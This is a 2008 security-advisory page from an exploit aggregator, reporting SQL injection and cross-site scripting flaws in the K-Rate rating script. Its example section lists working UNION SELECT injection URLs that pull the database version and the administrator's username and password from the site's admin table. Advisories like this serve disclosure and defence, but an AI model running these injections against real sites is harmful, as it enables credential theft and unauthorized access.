about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , K-Rate Multiple Input Validation Vulnerabilities


Title K-Rate Multiple Input Validation Vulnerabilities
Published 2008-08-26-12:00AM
Updated 2008-08-29-04:14PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Corwin
Vulnerable  TurnK KRate 0
Not Vulnerable  
Code  An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim user to follow a malicious URI.The following example URIs are available:http://www.example.com/index.php?req=online&show=1[SQL]
http://www.example.com/room/1[SQL]
http://www.example.com/index.php?req=view&user=somegirl&id=2[SQL]&act=vote&image=3&voter=12 vote=3
http://www.example.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3[SQL]&voter=12&vote=3
http://www.example.com/blog/somegirl[SQL]
http://www.example.com/index.php?req=blog_edit&id=1[SQL]
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,version(),4,5,6/*
http://www.example.com/room/-1 union select 1,version(),3,4/*
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,adm_user,4,5,6 from rate_admins where adm_id=1/*
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,adm_pass,4,5,6 from rate_admins where adm_id=1/*
http://www.example.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3&voter=12&vote=3[XSS]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 09:13:15 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
php.orig.4 trisha sex Tagger LE persianmus sexy.lk mambo Remo Sexsy+girl Boobs.com karimakapu t3xt 1t! VIDY t51t thirha Celeb CMS is Fre t657t Mg.liyanag mambo Remo PLEBOY includes/f CMS is Fre WWW.Slaz www.qqanba Www.Sexy Free Sex p red tube v CMS is Fre vbadvance Www.juliap Www+.sexy+ sign in on www. tamil www.jungle Sex films news for c www.pctool passport+m download a free game CMS is Fre Searching imag girl com_joomla 200 /compo t51t mambo Remo vedeiosex SMTPexploi Www xxl se sex boy vi